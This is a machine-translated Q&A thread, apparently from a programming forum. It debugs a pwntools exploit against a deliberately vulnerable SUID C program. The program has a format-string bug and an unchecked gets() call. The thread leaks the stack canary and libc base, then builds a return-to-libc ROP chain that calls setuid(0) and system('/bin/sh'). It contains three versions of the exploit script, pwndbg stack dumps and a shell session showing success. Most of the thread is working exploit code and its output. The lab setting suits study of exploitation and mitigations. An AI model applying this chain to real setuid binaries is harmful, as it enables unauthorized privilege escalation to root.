小贝子编程

c-获取缓冲区溢出的SIGSEV



我正试图在启用所有保护(即ASLR、canary、PIE、NX、Full RelRO-禁用Fortify(的情况下,在简单的x64 C二进制文件上创建缓冲区溢出。我使用的是(更新的(x64 Kali Linux 2020.3发行版(在vmware中,使用官方攻击性安全网站上的vmware映像(。我以root身份编译该程序,并启用SUID位以从无特权帐户访问具有root特权的程序。易受攻击程序(example5.c(的代码如下:

#include <stdio.h>
int main(int argc, char *argv[]){
vuln_func(argv[1]);
return 0;
}
void vuln_func(char *input){
char buffer[256];
printf(input);
printf("n");
gets(buffer);
}

并使用以下Makefile:编译程序

all: 
gcc example5.c -g -Wl,-z,relro,-z,now -o example5 -fstack-protector -D_FORTIFY_SOURCE=0 
clean:
rm example5

所以,我打开我的终端,输入:

su
<enter root password>
make
chmod u+s example5
exit

然后我使用我在python 3.8.6中创建的一个漏洞,使用pwntools泄露canary和libc的基地址(libc-2.31.so(,以执行返回libc攻击(使用2个小工具(。该漏洞利用如下(exploit5.py(:

#!/usr/bin/env python3
from pwn import *
p = process(["./example5", "%21$llx:%41$llx:"])
leak = p.readline().decode("utf-8").split(":")
libc_base = int(leak[0], 16) - 0x1f83cc
canary = int(leak[1], 16)
log.success(f"libc base: {hex(libc_base)}")
log.success(f"stack canary: {hex(canary)}")
poprdi_ret  = p64(libc_base + 0x2679e)  # pop rdi; ret
padding = b"A"*264 # junk - padding
padding += p64(canary) # stack canary
padding += b"B"*8 # override RBP address
"""
2 gadgets
setuid(0) - run as root 
system("/bin/sh") - execute a shell
"""
code = b""
code += poprdi_ret # pop rdi; ret
code += p64(0x0) # root uid
code += p64(libc_base + 0x25000 + 0xa70c0) # setuid address
code += poprdi_ret # pop rdi; ret
code += p64(libc_base + 0x18a156) # /bin/sh address
code += p64(libc_base + 0x25000 + 0x23db0) # system address
code += p64(libc_base + 0x25000 + 0x195c0) # exit address
payload = padding + code
p.sendline(payload)
p.interactive()

尽管这些值被正确地泄露了,但我得到了如下的分段错误:

kali@kali:~/Desktop/boe/example5$ ./exploit5.py 
[+] Starting local process './example5': pid 3288
[+] libc base: 0x7ffff7df5000
[+] stack canary: 0xccf346b075ea7800
[*] Switching to interactive mode
[*] Process './example5' stopped with exit code -11 (SIGSEGV) (pid 3288)
[*] Got EOF while reading in interactive
$ 
[*] Got EOF while sending in interactive

我认为您错误地计算了一些偏移量。我修改了你的脚本,使一些计算自动化。我正在使用Ubuntu 20.04进行测试。顺便说一句,您应该使用%p而不是%llx作为地址。

printf(input);之后设置断点,然后检查堆栈,我决定使用__libc_start_main来泄漏libc基础:

pwndbg> x/50gx $rsp
0x7ffe9551fac0: 0x0000000000000000  0x00007ffe95520419 <-- First 6 arguments are in registers, so stack starts with the seventh argument
0x7ffe9551fad0: 0x0000034000000340  0x0000034000000340
0x7ffe9551fae0: 0x0000034000000340  0x0000034000000340
0x7ffe9551faf0: 0x0000034000000340  0x0000034000000340
0x7ffe9551fb00: 0x0000034000000340  0x0000034000000340
0x7ffe9551fb10: 0x0000034000000340  0x0000034000000340
0x7ffe9551fb20: 0x0000034000000340  0x0000034000000340
0x7ffe9551fb30: 0x0000034000000340  0x0000034000000340
0x7ffe9551fb40: 0x0000000000000000  0x0000000000000100
0x7ffe9551fb50: 0x0000000000000000  0x0000000000000000
0x7ffe9551fb60: 0x0000000000000000  0x0000000000000000
0x7ffe9551fb70: 0x0000000000000000  0x0000000000000000
0x7ffe9551fb80: 0x0000000000000000  0x0000000000000000
0x7ffe9551fb90: 0x0000000000000000  0x0000000000000000
0x7ffe9551fba0: 0x000055f431237040  0x0000000000f0b5ff
0x7ffe9551fbb0: 0x00000000000000c2  0x00007ffe9551fbe7
0x7ffe9551fbc0: 0x00007ffe9551fbe6  0x000055f43123829d
0x7ffe9551fbd0: 0x00007fa277732fc8  0xb0b4adcb5c037800
0x7ffe9551fbe0: 0x00007ffe9551fc00  0x000055f4312381d4
0x7ffe9551fbf0: 0x00007ffe9551fcf8  0x0000000200000000
0x7ffe9551fc00: 0x0000000000000000  0x00007fa2775690b3 <-- I choose this address
0x7ffe9551fc10: 0x00007fa277778620  0x00007ffe9551fcf8
0x7ffe9551fc20: 0x0000000200000000  0x000055f4312381a9
0x7ffe9551fc30: 0x000055f431238250  0x647176ddde9b26f8
0x7ffe9551fc40: 0x000055f4312380c0  0x00007ffe9551fcf0
pwndbg> x/i 0x00007fa2775690b3
0x7fa2775690b3 <__libc_start_main+243>:  mov    edi,eax
pwndbg>

利用:

#!/usr/bin/env python3
from pwn import *
p = process(["./example5", "%41$p:%47$p:"])
elf = ELF('./example5')
lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
leak = p.readline().decode("utf-8").split(":")
canary = int(leak[0], 16)
libc_base = int(leak[1], 16) - lib.symbols['__libc_start_main'] - 243 # In my Ubuntu, %47$p is __libc_start_main+243, you should check your debugger
log.success(f"libc base: {hex(libc_base)}")
log.success(f"stack canary: {hex(canary)}")
poprdi_ret_gadget = 0x0000000000026b72            # ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | grep "pop rdi"
poprdi_ret  = p64(libc_base + poprdi_ret_gadget)  # pop rdi; ret
padding = b"A"*264     # junk - padding
padding += p64(canary) # stack canary
padding += b"B"*8      # override RBP address
"""
2 gadgets
setuid(0) - run as root 
system("/bin/sh") - execute a shell
"""
code = b""
code += poprdi_ret                                    # pop rdi; ret
code += p64(0x0)                                      # root uid
code += p64(libc_base + lib.symbols['setuid'])        # setuid address
code += poprdi_ret                                    # pop rdi; ret
code += p64(libc_base + next(lib.search(b'/bin/sh'))) # /bin/sh address
code += p64(libc_base + lib.symbols['system'])        # system address
code += p64(libc_base + lib.symbols['exit'])          # exit address
payload = padding + code
p.sendline(payload)
p.interactive()

结果:

zeltrax@ubuntu:~$ python3 test.py 
[+] Starting local process './example5': pid 2507
[*] '/home/zeltrax/example5'
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
[+] libc base: 0x7fcc1f376000
[+] stack canary: 0x5741569d0b8c9d00
[*] Switching to interactive mode
$ ls
a.out  Desktop           HeapLAB     pwn1         sandbox.py  test.py
bf.py  Dockerfile_example  libc.so.6   pwn2         solve2.py     tools
core   example5           msfinstall  random_gen    test.c     zeltrax00.ovpn
c.py   flag.txt           pictures    readfile.asm  test.o
$ whoami
zeltrax
$

首先,感谢你对我的帮助。其次,感谢你关于%p的提示。第三,总的来说,非常感谢你。这是一个愚蠢的错误。由于某种原因(正如您所说(,我将libc_base偏移量错误计算为0x1f83cc,而我本应使用0x1f73cc。我从你的代码中学到了很多关于pwntools的知识。所以我的机器上的最后一个漏洞是:

#!/usr/bin/env python3
from pwn import *

p = process(["./example5", "%21$p:%41$p:"])
lib = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
leak = p.readline().decode("utf-8").split(":")
libc_base = int(leak[0], 16) - 0x1f73cc
canary = int(leak[1], 16)
log.success(f"libc base: {hex(libc_base)}")
log.success(f"stack canary: {hex(canary)}")
poprdi_ret  = p64(libc_base + 0x2679e)                  # pop rdi; ret
padding = b"A"*264                                      # junk - padding
padding += p64(canary)                                  # stack canary
padding += b"B"*8                                       # override RBP address
code = b""
code += poprdi_ret                                      # pop rdi; ret
code += p64(0x0)                                        # root uid
code += p64(libc_base + lib.symbols['setuid'])          # setuid address
code += poprdi_ret                                      # pop rdi; ret
code += p64(libc_base + next(lib.search(b'/bin/sh')))   # /bin/sh address
code += p64(libc_base + lib.symbols['system'])          # system address
code += p64(libc_base + lib.symbols['exit'])            # exit address
payload = padding + code
p.sendline(payload)
p.interactive()

再次感谢!

相关内容

最新更新


热门标签:

javascript python java c# php android html jquery c++ css ios sql mysql arrays asp.net json python-3.x ruby-on-rails .net sql-server django objective-c excel regex ruby linux ajax iphone xml vba spring asp.net-mvc database wordpress string postgresql wpf windows xcode bash git oracle list vb.net multithreading eclipse algorithm macos powershell visual-studio image forms numpy scala function api selenium